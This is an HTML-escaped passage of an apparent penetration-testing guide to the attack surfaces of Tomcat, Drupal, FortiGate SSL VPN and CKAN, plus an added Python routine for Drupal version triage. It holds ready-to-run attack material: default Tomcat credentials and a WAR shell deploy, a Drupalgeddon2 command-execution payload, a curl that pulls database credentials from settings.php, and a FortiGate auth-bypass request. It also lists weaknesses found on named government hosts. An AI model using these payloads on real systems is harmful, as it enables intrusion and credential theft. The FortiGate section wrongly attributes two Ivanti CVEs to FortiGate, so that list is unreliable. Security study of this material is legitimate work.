&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# admin:admin, tomcat:tomcat, admin:password&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# both:both, manager:manager, role1:role1&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# If PUT deploy is enabled:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;PUT /manager/text/deploy?path&lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt;/shell HTTP/1.1
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;Content-Type: application/octet-stream
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&amp;lt;WAR file bytes&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="86-other-frameworks-and-their-indicators" &gt;
&lt;div&gt;
&lt;a href="#86-other-frameworks-and-their-indicators"&gt;
##
&lt;/a&gt;
8.6 Other Frameworks and Their Indicators
&lt;/div&gt;
&lt;/h3&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Framework&lt;/th&gt;
&lt;th&gt;Headers/Indicators&lt;/th&gt;
&lt;th&gt;Sensitive Surface&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Rails&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;Server: WEBrick&lt;/code&gt;, &lt;code&gt;X-Runtime&lt;/code&gt;, &lt;code&gt;X-Request-Id&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;/sidekiq&lt;/code&gt;, &lt;code&gt;/rails/mailers&lt;/code&gt;, &lt;code&gt;/rails/info&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Exchange&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;X-OWA-Version&lt;/code&gt;, &lt;code&gt;X-FEServer&lt;/code&gt;, &lt;code&gt;X-AspNet-Version&lt;/code&gt;, &lt;code&gt;WWW-Authenticate: NTLM&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;/owa/&lt;/code&gt;, &lt;code&gt;/ecp/&lt;/code&gt;, &lt;code&gt;/ews/Exchange.asmx&lt;/code&gt;, &lt;code&gt;/autodiscover/&lt;/code&gt;, &lt;code&gt;/powershell/&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Django&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;X-Frame-Options: DENY&lt;/code&gt;, CSRF token &lt;code&gt;csrftoken&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;/admin&lt;/code&gt;, &lt;code&gt;/api/&lt;/code&gt;, &lt;code&gt;/graphql/&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Express/Node&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;X-Powered-By: Express&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;/api/&lt;/code&gt;, &lt;code&gt;/graphql&lt;/code&gt;, &lt;code&gt;/health&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;AdonisJS&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Error &lt;code&gt;@adonisjs/http-server&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;/health&lt;/code&gt;, &lt;code&gt;/api/&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Flask&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;Server: Werkzeug/...&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;/console&lt;/code&gt; (debug), &lt;code&gt;/api/&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Nuxt.js&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;__nuxt&lt;/code&gt;, &lt;code&gt;__NUXT__&lt;/code&gt; in HTML&lt;/td&gt;
&lt;td&gt;&lt;code&gt;.output/&lt;/code&gt;, &lt;code&gt;/api/&lt;/code&gt;, &lt;code&gt;/_nuxt/&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Next.js&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;__NEXT_DATA__&lt;/code&gt; in HTML&lt;/td&gt;
&lt;td&gt;&lt;code&gt;/_next/&lt;/code&gt;, &lt;code&gt;/api/&lt;/code&gt;, &lt;code&gt;/_next/data/&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Drupal&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;Drupal&lt;/code&gt; in HTML, &lt;code&gt;/sites/default/&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;/user/login&lt;/code&gt;, &lt;code&gt;/node/&lt;/code&gt;, &lt;code&gt;/rest/&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Joomla&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;Joomla!&lt;/code&gt; in generator&lt;/td&gt;
&lt;td&gt;&lt;code&gt;/administrator/&lt;/code&gt;, &lt;code&gt;/components/&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;CodeIgniter&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;ci_session&lt;/code&gt; cookie&lt;/td&gt;
&lt;td&gt;&lt;code&gt;/index.php/&lt;/code&gt;, &lt;code&gt;?ci_profiler=1&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Drupal 6/7&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;Drupal.settings&lt;/code&gt; in JS, &lt;code&gt;/misc/&lt;/code&gt;, &lt;code&gt;/modules/&lt;/code&gt;, &lt;code&gt;/themes/&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;/update.php&lt;/code&gt;, &lt;code&gt;/install.php&lt;/code&gt;, &lt;code&gt;/xmlrpc.php&lt;/code&gt;, &lt;code&gt;/cron.php&lt;/code&gt;, &lt;code&gt;/user/login&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;CKAN&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;/api/3/action/package_list&lt;/code&gt;, &lt;code&gt;/dataset/&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;/api/3/action/organization_list&lt;/code&gt; (open data)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;OpenCms&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;JSESSIONID&lt;/code&gt;, &lt;code&gt;OpenCms/version&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;/handle404&lt;/code&gt;, &lt;code&gt;/opencms/opencms/secadmin/&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;h3 id="87-drupal--attack-surface" &gt;
&lt;div&gt;
&lt;a href="#87-drupal--attack-surface"&gt;
##
&lt;/a&gt;
8.7 Drupal — Attack Surface
&lt;/div&gt;
&lt;/h3&gt;
&lt;p&gt;Drupal 6 and 7 (both end-of-life) remain common in government and universities, and they carry well-known critical vulnerabilities:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 1. Identify version&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -s &lt;span style="color:#a6d189"&gt;&amp;#34;https://TARGET/&amp;#34;&lt;/span&gt; | grep -oP &lt;span style="color:#a6d189"&gt;&amp;#39;Drupal\.settings|drupal\.org&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -s &lt;span style="color:#a6d189"&gt;&amp;#34;https://TARGET/CHANGELOG.txt&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# robots.txt confirms Drupal: /misc/, /modules/, /profiles/, /themes/&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 2. Critical Drupal endpoints&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# update.php (DB update — access may allow SQL!)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -sI &lt;span style="color:#a6d189"&gt;&amp;#34;https://TARGET/update.php&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -s &lt;span style="color:#a6d189"&gt;&amp;#34;https://TARGET/update.php?op=info&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# install.php (if present = risk!)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -sI &lt;span style="color:#a6d189"&gt;&amp;#34;https://TARGET/install.php?profile=default&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# xmlrpc.php (active XML-RPC = same risk as WordPress)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -s -X POST &lt;span style="color:#a6d189"&gt;&amp;#34;https://TARGET/xmlrpc.php&amp;#34;&lt;/span&gt; &lt;span style="color:#8caaee"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; -d &lt;span style="color:#a6d189"&gt;&amp;#39;&amp;lt;?xml version=&amp;#34;1.0&amp;#34;?&amp;gt;&amp;lt;methodCall&amp;gt;&amp;lt;methodName&amp;gt;system.listMethods&amp;lt;/methodName&amp;gt;&amp;lt;/methodCall&amp;gt;&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# cron.php (executes scheduled tasks)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -sI &lt;span style="color:#a6d189"&gt;&amp;#34;https://TARGET/cron.php&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 3. Main CVEs&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# CVE-2018-7600 (Drupalgeddon 2) — RCE via render arrays (Drupal 6/7/8)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Payload: POST /user/register?element_parents=account/mail/%23value&amp;amp;ajax_form=1&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# + form_id=user_register_form&amp;amp;mail[#type]=markup&amp;amp;mail[#markup]=&amp;lt;?php system(&amp;#39;id&amp;#39;);?&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# CVE-2019-6340 — RCE via RESTful Web Services (Drupal 8)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# CVE-2014-3704 (Drupalgeddon 1) — SQLi (Drupal 7)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 4. Sensitive files&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -s &lt;span style="color:#a6d189"&gt;&amp;#34;https://TARGET/sites/default/files/.htaccess&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -s &lt;span style="color:#a6d189"&gt;&amp;#34;https://TARGET/sites/default/settings.php&amp;#34;&lt;/span&gt; &lt;span style="color:#737994;font-style:italic"&gt;# DB credentials!&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -s &lt;span style="color:#a6d189"&gt;&amp;#34;https://TARGET/sites/all/libraries/&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;&lt;strong&gt;Real-world case&lt;/strong&gt;: Government geographic agency — Drupal 6 + PHP 5.5.9 + Ubuntu 14.04:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;update.php&lt;/code&gt; accessible with update instructions exposed&lt;/li&gt;
&lt;li&gt;&lt;code&gt;install.php&lt;/code&gt; present (500, but exists)&lt;/li&gt;
&lt;li&gt;&lt;code&gt;xmlrpc.php&lt;/code&gt; active (200)&lt;/li&gt;
&lt;li&gt;&lt;code&gt;cron.php&lt;/code&gt; accessible&lt;/li&gt;
&lt;li&gt;Drupalgeddon2 applicable → potential RCE&lt;/li&gt;
&lt;/ul&gt;
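&lt;p&gt;As an added example (not code from the original post), a small triage routine for the CHANGELOG.txt check above: it extracts the running core version from the first release heading of a Drupal 6/7 CHANGELOG.txt, flags whether that major is past its upstream end-of-life date, and whether the version predates the SA-CORE-2018-002 fix for CVE-2018-7600 (first shipped in 7.58, 8.3.9, 8.4.6 and 8.5.1; Drupal 6 received no upstream fix). The changelog text is a constructed excerpt in the layout of the real file, and the reference date passed to &lt;code&gt;triage&lt;/code&gt; is an assumption.&lt;/p&gt;

```python
import datetime
import re

# Upstream end-of-life dates for Drupal core majors. After this date the
# Drupal security team issues no advisories or fixes for that major.
DRUPAL_EOL = {
    6: datetime.date(2016, 2, 24),
    7: datetime.date(2025, 1, 5),
    8: datetime.date(2021, 11, 2),
    9: datetime.date(2023, 11, 1),
}

# First release per branch that contains the SA-CORE-2018-002 fix
# (CVE-2018-7600). Drupal 6 got no upstream fix because it was already EOL.
SA_CORE_2018_002_FIXED = {
    (7,): (7, 58),
    (8, 3): (8, 3, 9),
    (8, 4): (8, 4, 6),
    (8, 5): (8, 5, 1),
}

# Constructed excerpt in the layout of a Drupal 7 CHANGELOG.txt; the newest
# release is always the first "Drupal X.Y, YYYY-MM-DD" heading in the file.
SAMPLE_CHANGELOG = """\
Drupal 7.56, 2017-06-21
-----------------------
- Fixed security issues (access bypass). See SA-CORE-2017-003.

Drupal 7.55, 2017-06-07
-----------------------
- Fixed incompatibility with PHP versions 7.0.19 and 7.1.5.
"""

_RELEASE_LINE = re.compile(
    r"^Drupal (\d+)\.(\d+)(?:\.(\d+))?[^,]*, (\d{4}-\d{2}-\d{2})", re.MULTILINE
)


def changelog_version(text):
    """Return (version_tuple, release_date) from a CHANGELOG.txt, or None."""
    m = _RELEASE_LINE.search(text)
    if m is None:
        return None
    parts = tuple(int(p) for p in m.groups()[:3] if p is not None)
    release_date = datetime.date.fromisoformat(m.group(4))
    return parts, release_date


def is_eol(version, today):
    """True when the major is past its upstream end-of-life date."""
    eol = DRUPAL_EOL.get(version[0])
    return eol is not None and today > eol


def sa_core_2018_002_unpatched(version):
    """True when this core version predates the SA-CORE-2018-002 fix."""
    if version[0] == 6:
        return True
    if version[0] == 7:
        return SA_CORE_2018_002_FIXED[(7,)] > version
    if version[0] == 8:
        fixed = SA_CORE_2018_002_FIXED.get(version[:2])
        # 8.0 to 8.2 were unsupported when the advisory shipped and got no fix
        return fixed is None or fixed > version
    return False


def triage(changelog_text, today_iso):
    """Summarise what a reachable CHANGELOG.txt tells the asset owner."""
    found = changelog_version(changelog_text)
    if found is None:
        return None
    version, release_date = found
    today = datetime.date.fromisoformat(today_iso)
    return {
        "version": ".".join(str(p) for p in version),
        "released": release_date.isoformat(),
        "eol": is_eol(version, today),
        "sa_core_2018_002_unpatched": sa_core_2018_002_unpatched(version),
    }


if __name__ == "__main__":
    print(triage(SAMPLE_CHANGELOG, "2026-06-22"))
```

A reachable CHANGELOG.txt is itself a finding (the version becomes public), so the practical remediation is to block the file at the web server and patch or migrate; the triage output tells you how urgent that is.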
&lt;h3 id="88-fortinet-fortigate-ssl-vpn--attack-surface" &gt;
&lt;div&gt;
&lt;a href="#88-fortinet-fortigate-ssl-vpn--attack-surface"&gt;
##
&lt;/a&gt;
8.8 Fortinet FortiGate SSL VPN — Attack Surface
&lt;/div&gt;
&lt;/h3&gt;
&lt;p&gt;VPN appliances are the most common entry point in 2024-2026. FortiGate is widely used in government.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 1. Identify FortiGate&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -skI &lt;span style="color:#a6d189"&gt;&amp;#34;https://TARGET/&amp;#34;&lt;/span&gt; | grep -i &lt;span style="color:#a6d189"&gt;&amp;#34;forti&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -sk &lt;span style="color:#a6d189"&gt;&amp;#34;https://TARGET/remote/info&amp;#34;&lt;/span&gt; &lt;span style="color:#737994;font-style:italic"&gt;# XML with config: salt, encmethod&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -sk &lt;span style="color:#a6d189"&gt;&amp;#34;https://TARGET/remote/login&amp;#34;&lt;/span&gt; &lt;span style="color:#737994;font-style:italic"&gt;# Login page&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -sk &lt;span style="color:#a6d189"&gt;&amp;#34;https://TARGET/remote/fgt_lang?lang=en&amp;#34;&lt;/span&gt; &lt;span style="color:#737994;font-style:italic"&gt;# 641KB language file → version!&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 2. CVEs by impact order&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# CVE-2022-40684 — Auth bypass (CVSS 9.8)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# curl -k -H &amp;#34;User-Agent: Node.js/12.0.0&amp;#34; \&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# -H &amp;#34;X-Forwarded-For: 127.0.0.1&amp;#34; \&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# &amp;#34;https://TARGET/api/v2/cmdb/system/admin&amp;#34; &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# → Returns admin users WITHOUT authentication!&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# CVE-2023-27997 — Heap overflow SSL-VPN (pre-auth RCE)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# CVE-2024-21887 — Command injection SSL-VPN (pre-auth RCE)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# CVE-2024-22024 — XXE → file read&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 3. Fingerprinting via headers&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -skI &lt;span style="color:#a6d189"&gt;&amp;#34;https://TARGET/remote/login&amp;#34;&lt;/span&gt; | grep -iE &lt;span style="color:#a6d189"&gt;&amp;#34;(server|set-cookie|www-authenticate)&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;&lt;strong&gt;Real-world case&lt;/strong&gt;: &lt;code&gt;vpn.orgao.gov.ar&lt;/code&gt; — FortiGate SSL VPN exposed:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;/remote/info&lt;/code&gt; accessible exposing salt and &lt;code&gt;encmethod='0'&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;/remote/fgt_lang&lt;/code&gt; → 641KB of strings for fingerprinting&lt;/li&gt;
&lt;li&gt;&lt;code&gt;/remote/logincheck&lt;/code&gt; — authentication endpoint&lt;/li&gt;
&lt;li&gt;&lt;code&gt;/remote/portal&lt;/code&gt; — SSL VPN Web Portal&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id="89-ckan-open-data--100-open-api" &gt;
&lt;div&gt;
&lt;a href="#89-ckan-open-data--100-open-api"&gt;
##
&lt;/a&gt;
8.9 CKAN Open Data — 100% Open API
&lt;/div&gt;
&lt;/h3&gt;
&lt;p&gt;CKAN is an open data platform common in governments. The API is public by design and exposes metadata from thousands of datasets:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 1. Identify CKAN&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -s &lt;span style="color:#a6d189"&gt;&amp;#34;https://TARGET/&amp;#34;&lt;/span&gt; | grep -i &lt;span style="color:#a6d189"&gt;&amp;#34;ckan\|dataset&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -s &lt;span style="color:#a6d189"&gt;&amp;#34;https://TARGET/api/3/action/package_list&amp;#34;&lt;/span&gt; &lt;span style="color:#737994;font-style:italic"&gt;# Lists all datasets&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 2. Enumerate organizations (who publishes data)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -s &lt;span style="color:#a6d189"&gt;&amp;#34;https://TARGET/api/3/action/organization_list?all_fields=true&amp;#34;&lt;/span&gt; | &lt;span style="color:#8caaee"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; jq &lt;span style="color:#a6d189"&gt;&amp;#39;.result[] | {name, package_count: .package_count}&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 3. List datasets from an organization&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -s &lt;span style="color:#a6d189"&gt;&amp;#34;https://TARGET/api/3/action/package_search?q=organization:org-name&amp;amp;rows=1000&amp;#34;&lt;/span&gt; | &lt;span style="color:#8caaee"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; jq &lt;span style="color:#a6d189"&gt;&amp;#39;.result.results[] | {name, title, resources: [.resources[].url]}&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 4. Search for specific datasets&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -s &lt;span style="color:#a6d189"&gt;&amp;#34;https://TARGET/api/3/action/package_search?q=password&amp;#34;&lt;/span&gt; | jq &lt;span style="color:#a6d189"&gt;&amp;#39;.result.count&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 5. Tags, groups, licenses&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -s &lt;span style="color:#a6d189"&gt;&amp;#34;https://TARGET/api/3/action/tag_list&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -s &lt;span style="color:#a6d189"&gt;&amp;#34;https://TARGET/api/3/action/group_list&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;&lt;strong&gt;Real-world case&lt;/strong&gt;: &lt;code&gt;datos.gob.ar&lt;/code&gt; — CKAN with:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;45 Argentine government organizations&lt;/li&gt;
&lt;li&gt;1000+ public datasets&lt;/li&gt;
&lt;li&gt;Completely open API without authentication (expected for an open-data portal: the action API is public by design, so this alone is not a finding)&lt;/li&gt;
&lt;li&gt;Spring Boot Actuator returning 500 (potential info disclosure)&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id="810-zimbra--attack-surface" &gt;
&lt;div&gt;
&lt;a href="#810-zimbra--attack-surface"&gt;
##
&lt;/a&gt;
8.10 Zimbra — Attack Surface
